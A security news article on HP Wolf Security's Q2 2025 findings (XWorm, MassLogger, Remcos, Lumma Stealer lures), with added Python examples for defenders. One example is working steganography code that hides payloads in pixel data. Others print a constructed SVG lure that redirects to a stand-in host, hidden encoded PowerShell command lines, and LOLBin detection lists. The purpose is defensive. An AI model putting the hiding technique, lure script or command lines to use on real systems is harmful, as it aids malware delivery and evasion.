Old file types, new tricks: Attackers turn everyday files into weapons


Attackers are finding new ways to blend in with everyday business tools, hiding their activity inside formats and processes that workers and IT teams often trust. The latest quarterly Threat Insights Report from HP Wolf Security shows how attackers continue to adapt, making it harder for defenses to keep up.

Living off the land to stay hidden

One of the most notable campaigns observed in Q2 2025 delivered the XWorm remote access trojan. Instead of relying on custom malware alone, the attackers chained together several built-in Windows tools. These so-called “living off the land” binaries (LOLBins) let them execute commands, copy files, and decode hidden payloads while triggering fewer alerts than a dropped executable would.

XWorm configuration (Source: HP Wolf Security)

The final XWorm payload was concealed in the pixel data of a legitimate image hosted on a trusted website, so the download itself looked benign. PowerShell scripts extracted the hidden data, and MSBuild, Microsoft's build engine, which can compile and execute code embedded in a project file, ran the malware. By the time the infection was complete, the attackers had remote access and the ability to steal data, with most of the work carried out by programs already present on the system.
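To make the steganography step concrete, here is an added example (not code from HP or the report) that hides a byte string in the low bits of pixel data and reads it back. The encoding is an assumption: plain least-significant-bit (LSB) embedding, a common choice, whereas the article does not say which scheme the XWorm campaign used. The "image" and payload are constructed in the script; the point is that the carrier stays a valid, visually unchanged picture and only the extraction script knows anything is there.

```python
# Added example (not from HP or the report): payload hidden in pixel LSBs.
# Assumption: LSB embedding; the real campaign's encoding is not specified.
import struct
from typing import Iterator, List, Tuple

Pixel = Tuple[int, int, int]  # 8-bit RGB


def carrier_image(width: int, height: int) -> List[Pixel]:
    """Constructed sample 'image': a smooth gradient standing in for a photo."""
    return [((x * 255) // max(width - 1, 1), (y * 255) // max(height - 1, 1), 128)
            for y in range(height) for x in range(width)]


def _bit_stream(data: bytes) -> Iterator[int]:
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def embed(pixels: List[Pixel], payload: bytes) -> List[Pixel]:
    """Write a length-prefixed payload into the LSB of each colour channel.

    Every channel value changes by at most 1, so the file remains a valid
    image that looks identical; a scanner sees an ordinary picture.
    """
    framed = struct.pack(">I", len(payload)) + payload
    capacity = (len(pixels) * 3) // 8
    if len(framed) > capacity:
        raise ValueError(f"payload needs {len(framed)} bytes, carrier holds {capacity}")
    bits = _bit_stream(framed)
    out: List[Pixel] = []
    for px in pixels:
        chans = list(px)
        for i in range(3):
            b = next(bits, None)
            if b is None:
                break
            chans[i] = (chans[i] & 0xFE) | b
        out.append((chans[0], chans[1], chans[2]))
    return out


def extract(pixels: List[Pixel]) -> bytes:
    """Recover the payload: read the 4-byte length prefix, then that many bytes."""
    bits = [chan & 1 for px in pixels for chan in px]

    def read_bytes(offset_bits: int, count: int) -> bytes:
        out = bytearray()
        for i in range(count):
            value = 0
            for j in range(8):
                value = (value << 1) | bits[offset_bits + i * 8 + j]
            out.append(value)
        return bytes(out)

    length = struct.unpack(">I", read_bytes(0, 4))[0]
    if length > (len(bits) - 32) // 8:
        raise ValueError("length prefix exceeds carrier size: not a stego image, or corrupted")
    return read_bytes(32, length)


def max_channel_delta(a: List[Pixel], b: List[Pixel]) -> int:
    """Largest per-channel change between two images (1 for LSB embedding)."""
    return max(abs(x - y) for pa, pb in zip(a, b) for x, y in zip(pa, pb))


if __name__ == "__main__":
    secret = b"constructed payload, not malware"   # a real campaign hides encoded malware here
    clean = carrier_image(64, 64)
    stego = embed(clean, secret)
    print("recovered:", extract(stego))
    print("max channel delta:", max_channel_delta(clean, stego))
```

The defensive lesson is in `max_channel_delta`: the carrier differs from the original by at most one unit per channel, so hash- or signature-based scanning of the image file finds nothing. What is observable is the consumer, a script host reading an image byte by byte and handing the result to a build tool, which is why the detection effort belongs on process behavior rather than on the download.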

“Living off the land techniques are notoriously difficult for security teams because it’s hard to tell green flags from red – i.e. legitimate activity versus an attack. You’re stuck between a rock and a hard place – lock down activity and create friction for users and tickets for the SOC or leave it open and risk an attacker slipping through. Even the best detection will miss some threats, so defense-in-depth with containment and isolation is essential to trap attacks before they can cause harm,” said Dr. Ian Pratt, Global Head of Security for Personal Systems at HP Inc.

Invoices and fake documents still work

Phishing emails remain the dominant delivery method, accounting for 61% of threats that reached endpoints. Attackers continue to refine how they use document formats as lures.

One campaign used realistic invoice-themed emails to trick recipients into opening SVG attachments. SVG is an XML image format that browsers render and that can carry JavaScript, so the attachments were able to display a convincing imitation of Adobe Acrobat, complete with animations and progress bars, before prompting users to download malware. The script that followed was a lightweight reverse shell, giving the attackers command execution and data collection without the footprint of a full remote access trojan.
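Because SVG attachments are images to a user but documents with script to a browser, a mail gateway can refuse SVGs that carry active content rather than relying on a signature for each lure. The following added check (not code from HP or the report) walks the XML and flags script elements, event-handler attributes and `javascript:` links; the lure SVG is constructed here to resemble the fake Acrobat "loading" animation described above.

```python
# Added example (not from HP or the report): reject SVG attachments with
# active content. The sample SVGs below are constructed for the demo.
import re
import xml.etree.ElementTree as ET
from typing import List, Tuple

EVENT_ATTR = re.compile(r"^on[a-z]+$", re.IGNORECASE)              # onload, onclick, ...
ACTIVE_URI = re.compile(r"^\s*(javascript|vbscript|data):", re.IGNORECASE)
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object"}


def svg_findings(svg_bytes: bytes) -> List[Tuple[str, str]]:
    """Return (kind, snippet) pairs; an empty list means no active content found.

    Note: xml.etree is not hardened against entity-expansion attacks; in a
    gateway use defusedxml or disable DTD processing before parsing.
    """
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        # Malformed XML is a reason to hold the file, not to pass it: browsers
        # are far more forgiving than this parser.
        return [("unparseable", str(exc)[:60])]
    findings: List[Tuple[str, str]] = []
    for el in root.iter():
        tag = el.tag.split("}")[-1].lower()          # drop the namespace prefix
        if tag in ACTIVE_TAGS:
            findings.append((f"element:{tag}", (el.text or "").strip()[:40]))
        for attr, value in el.attrib.items():
            name = attr.split("}")[-1]                # {xlink-ns}href -> href
            if EVENT_ATTR.match(name):
                findings.append((f"event-handler:{name}", value[:40]))
            elif name.lower() in ("href", "src") and ACTIVE_URI.match(value):
                findings.append((f"active-uri:{name}", value[:40]))
    return findings


def should_quarantine(svg_bytes: bytes) -> bool:
    return bool(svg_findings(svg_bytes))


# Constructed lure: fake viewer with a progress bar, then a script-driven download.
LURE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
  width="600" height="400" onload="setTimeout(go, 1500)">
  <rect width="600" height="400" fill="#fff"/>
  <text x="40" y="60">Adobe Acrobat: loading invoice_8821.pdf</text>
  <rect id="bar" x="40" y="100" width="10" height="12" fill="#d00">
    <animate attributeName="width" from="10" to="520" dur="2s" fill="freeze"/>
  </rect>
  <a xlink:href="javascript:go()"><text x="40" y="160">Download</text></a>
  <script>function go(){ location = "https://example.invalid/stage2"; }</script>
</svg>"""

# Constructed benign icon: shapes only, no script, no handlers.
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10"><circle cx="5" cy="5" r="4" fill="blue"/></svg>'


if __name__ == "__main__":
    for label, data in (("lure", LURE_SVG), ("benign", BENIGN_SVG)):
        print(label, "->", "quarantine" if should_quarantine(data) else "pass", svg_findings(data))
```

The animation elements are left alone on purpose: `animate` is how the lure draws its progress bar, but animation on its own cannot fetch or run anything, and flagging it would block every animated logo. The three things that do matter, a `script` element, an `on*` handler and a `javascript:` target, are all present in the constructed lure and absent from the icon.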

Another wave of phishing leaned on PDF attachments showing a blurred invoice with a download button. The link led to a ZIP file containing a malicious encoded VBScript (.vbe). The script stored key parts of the malware directly in the Windows Registry rather than on disk, making file-based detection harder. The final payload was MassLogger, a credential stealer capable of capturing keystrokes and browser data. In some cases, if the victim was located in France, the attackers also deployed a secondary remote access trojan called ModiRAT.

Old file types resurface

The report also describes attackers repurposing formats that many users rarely see today. Compiled HTML Help (.chm) files, once used for Windows application manuals, are being weaponized to deliver malware. A .chm is a container of HTML pages that the Windows help viewer renders, and those pages can carry script, which makes the format a convenient wrapper for multi-stage infections. In observed campaigns, opening a help file disguised as project documentation triggered scripts that eventually led to XWorm infections.

Shortcut files (.lnk) also made a return. In one case they were disguised as PDFs inside a ZIP archive delivered through a phishing email; a shortcut carries its own icon, and Windows hides the .lnk extension, so a name ending in "pdf" is all the user sees. Instead of opening a document, the shortcut executed malicious code that installed the Remcos remote access trojan. The attackers stored the final payload in the legacy Program Information File (.pif) format, which Windows still treats as an executable but which is rare enough today that users and some tools are less likely to flag it.

Lumma Stealer survives takedown

Even law enforcement actions have not stopped some operators. Lumma Stealer was disrupted in May 2025 through an international takedown that seized much of its infrastructure. Yet campaigns distributing it continued in June, with attackers shifting to new servers and methods.

One delivery chain used IMG disk images attached to phishing emails. When opened, Windows mounts such an image as a virtual drive, so the user is shown a folder containing an HTML Application (.hta) file disguised as an invoice. An HTA is executed by a built-in Windows script host rather than rendered as a document, and this one ran obfuscated PowerShell that unpacked and executed Lumma Stealer in memory, sidestepping detection that relies on scanning files written to disk.

Threat delivery trends

Archives were the top delivery vehicle in Q2 2025, making up 40% of observed threats. Scripts and executables followed closely at 35%. Document formats such as Word, Excel, and PDF made up smaller but still significant shares.

The findings show how attackers continue to rotate through different file types, choosing the ones most likely to reach users without being flagged. Even older formats like .chm help files and PIF executables are finding new life in current campaigns.
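Archives are where most of the file types in this report arrive (the PDF-named shortcut and the .pif payload, the .chm "documentation", the scripts), so one place to act is a triage pass over each ZIP member before it reaches a mailbox. The following added example (not code from HP or the report) flags members three ways: by a dangerous final extension, by a document extension sitting in front of an executable one, and by the file header regardless of name, so a shortcut simply renamed to .pdf is still caught. The ZIP is constructed in memory; the Shell Link and CHM signatures are the real ones, the rest of each member is filler.

```python
# Added example (not from HP or the report): triage of ZIP members by
# extension, double extension and file signature. Sample archive constructed.
import io
import posixpath
import zipfile
from typing import Dict, List, Tuple

EXECUTABLE_EXT = {".lnk", ".pif", ".hta", ".vbe", ".vbs", ".js", ".jse", ".wsf",
                  ".chm", ".scr", ".exe", ".com", ".bat", ".cmd", ".ps1", ".msi", ".svg"}
DOCUMENT_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}

# File signatures that do not care what the name says.
MAGIC: Dict[str, bytes] = {
    # Shell Link: HeaderSize 0x0000004C followed by LinkCLSID 00021401-0000-0000-C000-000000000046
    "lnk": bytes.fromhex("4C000000" "0114020000000000C000000000000046"),
    "pe":  b"MZ",      # .exe/.scr/.pif/.com payloads are normally PE images
    "chm": b"ITSF",    # Compiled HTML Help container
}


def _extensions(member_name: str) -> List[str]:
    """['.pdf', '.lnk'] for 'Invoice.pdf      .lnk'; padding spaces are stripped."""
    base = posixpath.basename(member_name).lower()
    return ["." + part.strip() for part in base.split(".")[1:]]


def triage_zip(zip_bytes: bytes) -> List[Tuple[str, List[str]]]:
    """Return (member name, reasons) for every member worth holding back."""
    findings: List[Tuple[str, List[str]]] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            exts = _extensions(info.filename)
            last = exts[-1] if exts else ""
            reasons: List[str] = []
            if last in EXECUTABLE_EXT:
                reasons.append(f"executable extension {last}")
            if len(exts) >= 2 and exts[-2] in DOCUMENT_EXT and last in EXECUTABLE_EXT:
                reasons.append("document extension masking an executable one")
            with zf.open(info) as fh:
                head = fh.read(32)              # enough for every signature above
            if head.startswith(MAGIC["lnk"]) and last != ".lnk":
                reasons.append("Shell Link header under a non-.lnk name")
            if head.startswith(MAGIC["chm"]) and last != ".chm":
                reasons.append("CHM header under a non-.chm name")
            if head.startswith(MAGIC["pe"]) and last in DOCUMENT_EXT:
                reasons.append("PE header under a document extension")
            if reasons:
                findings.append((info.filename, reasons))
    return findings


def build_sample_zip() -> bytes:
    """Constructed attachment mimicking the lures in the report (no real malware)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice_4471.pdf                .lnk", MAGIC["lnk"] + b"\x00" * 48)
        zf.writestr("Invoice_4471.pdf", MAGIC["lnk"] + b"\x00" * 48)   # shortcut renamed to .pdf
        zf.writestr("Project_Docs.chm", MAGIC["chm"] + b"\x00" * 48)
        zf.writestr("setup.pif", MAGIC["pe"] + b"\x00" * 62)
        zf.writestr("cover_letter.txt", b"Please find attached the signed invoice.")
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in triage_zip(build_sample_zip()):
        print(f"{name!r}: {'; '.join(reasons)}")
```

The header check is the one that earns its keep: extension lists are only as good as their last update, while a shortcut cannot stop being a shortcut. IMG and ISO attachments need the same treatment after mounting or parsing the image, which this ZIP-only example does not do.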

What this means for defenders

The report shows that attackers are putting effort into blending in with legitimate activity. By hiding malware inside trusted file formats, leaning on built-in system tools, and using realistic lures, they reduce the chances of being caught early.

For defenders, this means looking beyond file signatures and extension-based filtering. Detection that focuses on behavior (which process launched which, script hosts and build tools started from user-facing applications, encoded or hidden command lines), on persistence techniques such as payloads stored in the registry, and on misuse of built-in system tools is becoming the part that actually catches these chains.
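What "behavior-based" means in practice for the chains in this article is a rule over process-creation telemetry: a script host starting MSBuild (the XWorm chain), an HTA run from a freshly mounted drive followed by encoded PowerShell (the Lumma chain), or the help viewer spawning a shell (the .chm lure). The following added example (not code from HP or the report) runs such a rule over events of the kind Sysmon Event ID 1 or EDR sensors provide. The events, PIDs, paths and command lines are constructed for the demo, and the process lists are an assumed, deliberately short starting point rather than a complete LOLBin catalogue.

```python
# Added example (not from HP or the report): LOLBin chain detection over
# constructed process-creation events. Lists below are assumed starting points.
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str


LOLBINS = {"msbuild.exe", "mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
           "pwsh.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "hh.exe",
           "bitsadmin.exe", "installutil.exe", "regasm.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
# Applications that open attachments. explorer.exe is left out on purpose: it is
# the parent of nearly everything a user starts and would drown the rule in noise.
USER_FACING = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe", "acrord32.exe",
               "chrome.exe", "msedge.exe", "firefox.exe", "thunderbird.exe"}
SUSPICIOUS_PS = ("-enc", "-encodedcommand", "frombase64string", "downloadstring",
                 "-w hidden", "-windowstyle hidden", "iex ", "invoke-expression")
# An .hta run from any drive other than the system drive (mounted IMG/ISO, USB).
HTA_OFF_SYSTEM_DRIVE = re.compile(r"\b[d-z]:\\[^\s\"]*\.hta\b")


def _base(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_lolbin_chains(events: List[ProcEvent]) -> List[Tuple[int, str, List[str]]]:
    """Return (pid, image, reasons) for every process that deserves a look."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    alerts: List[Tuple[int, str, List[str]]] = []
    for ev in events:
        img = _base(ev.image)
        if img not in LOLBINS:
            continue
        parent = by_pid.get(ev.ppid)
        pimg = _base(parent.image) if parent else ""
        reasons: List[str] = []
        if pimg in USER_FACING:
            reasons.append(f"{pimg} spawned {img}")
        if pimg in LOLBINS and pimg != img:
            reasons.append(f"LOLBin chain {pimg} -> {img}")
        if img == "msbuild.exe" and pimg in SCRIPT_HOSTS:
            reasons.append("MSBuild started by a script host: inline-task code execution")
        cl = ev.cmdline.lower()
        if img in ("powershell.exe", "pwsh.exe") and any(s in cl for s in SUSPICIOUS_PS):
            reasons.append("encoded, hidden or download-and-execute PowerShell")
        if img == "mshta.exe" and HTA_OFF_SYSTEM_DRIVE.search(cl):
            reasons.append("HTA launched from a non-system drive (mounted image?)")
        if reasons:
            alerts.append((ev.pid, img, reasons))
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSB = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"

# Constructed telemetry mirroring the article's chains plus benign activity.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # Lumma-style: HTA on a mounted image drive, then hidden encoded PowerShell
    ProcEvent(210, 100, r"C:\Windows\System32\mshta.exe", r'mshta.exe "E:\Invoice_2025_Q2.hta"'),
    ProcEvent(220, 210, PS, "powershell.exe -w hidden -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    # XWorm-style: PowerShell reads the carrier image, MSBuild executes the result
    ProcEvent(300, 100, PS, r'powershell.exe -ep bypass -w hidden -c "$img=[IO.File]::ReadAllBytes(\"C:\Users\Public\flower.png\")"'),
    ProcEvent(310, 300, MSB, r"MSBuild.exe C:\Users\Public\build.xml"),
    # CHM lure: help viewer launching a script host
    ProcEvent(500, 100, r"C:\Windows\hh.exe", r'hh.exe "C:\Users\dev\Downloads\Project_Docs.chm"'),
    ProcEvent(510, 500, PS, "powershell.exe -nop -c \"iex (gc $env:TEMP\\s.ps1 -raw)\""),
    # Benign: a developer build from Visual Studio, and a text editor
    ProcEvent(400, 100, r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe", "devenv.exe"),
    ProcEvent(410, 400, MSB, r"MSBuild.exe C:\src\app\app.sln /t:Build"),
    ProcEvent(600, 100, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]


if __name__ == "__main__":
    for pid, img, reasons in find_lolbin_chains(SAMPLE_EVENTS):
        print(pid, img, "|", "; ".join(reasons))
```

Two design choices are worth stating. MSBuild under devenv.exe produces no alert, and hh.exe under explorer.exe produces none either; the rule fires on the step that has no legitimate everyday counterpart (a help viewer or a script host handing control to another LOLBin), which is what keeps it usable on developer workstations. And the parent lookup is by PID within the batch, so in a real pipeline the events must be joined on parent PID plus parent start time, since PIDs are reused.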

The campaigns described here show that attackers do not need advanced malware when familiar tools and file types can be turned into weapons.

“Attackers aren’t reinventing the wheel, but they are refining their techniques. Living-off-the-land, reverse shells and phishing have been around for decades, but today’s threat actors are sharpening these methods. We’re seeing more chaining of living-off-the-land tools and use of less obvious file types, such as images, to evade detection. Take reverse shells as an example – you don’t have to drop a fully-fledged RAT when a simple, lightweight script will achieve the same effect. It’s simple, fast and often slips under the radar because it’s so basic,” noted Alex Holland, Principal Threat Researcher, HP Security Lab.



About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.